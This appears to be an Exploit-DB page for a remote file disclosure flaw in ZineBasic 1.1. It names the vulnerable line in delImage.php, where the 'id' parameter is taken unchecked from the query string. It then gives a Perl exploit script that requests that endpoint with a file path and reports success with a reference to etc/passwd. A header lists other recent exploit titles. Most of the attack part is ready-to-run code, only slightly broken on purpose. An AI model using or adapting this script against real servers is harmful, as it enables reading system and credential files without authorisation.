235761b103
12 new exploits OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs ZineBasic 1.1 - Arbitrary File Disclosure SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities MyBB 1.8.6 - SQL Injection Kajona 4.7 - Cross-Site Scripting / Directory Traversal Docker Daemon - Privilege Escalation (Metasploit) SolarWinds Kiwi Syslog Server 9.5.1 - Unquoted Service Path Privilege Escalation EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow
42 lines
1.6 KiB
Text
Executable file
42 lines
1.6 KiB
Text
Executable file
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
|
|
# Author: bd0rk || East Germany former GDR
|
|
# Tested on: Ubuntu-Linux
|
|
# Vendor: http://w2scripts.com/news-publishing/
|
|
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
|
|
# Twitter: twitter.com/bd0rk
|
|
|
|
#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
|
|
----------------------------------------------------------------------------------
|
|
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
|
|
|
|
=> Vulnerable snippet: $id = $_GET['id'];
|
|
|
|
----------------------------------------------------------------------------------
|
|
|
|
Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
#!/usr/bin/perl
|
|
use LWP::Simple;
|
|
use LWP::UserAgent;
|
|
sub ex()
|
|
{
|
|
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
|
|
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
|
|
print "\ Contact: twitter.com/bd0rk\n";
|
|
($host, $path, $under, $file,) = @ARGV;
|
|
$under="/articleImg/";
|
|
$file="delImage.php?id=[REMOTE_FILE]";
|
|
my $target = "http://".$host.$path.$under.$file;
|
|
my $usrAgent = LWP::UserAgent->new();
|
|
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
|
|
if ($request->is_success)
|
|
{
|
|
print "$target <= JACKPOT!\n\n";
|
|
print "etc/passwd\n";
|
|
exit();
|
|
}
|
|
else
|
|
{
|
|
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
|
|
exit();
|
|
}
|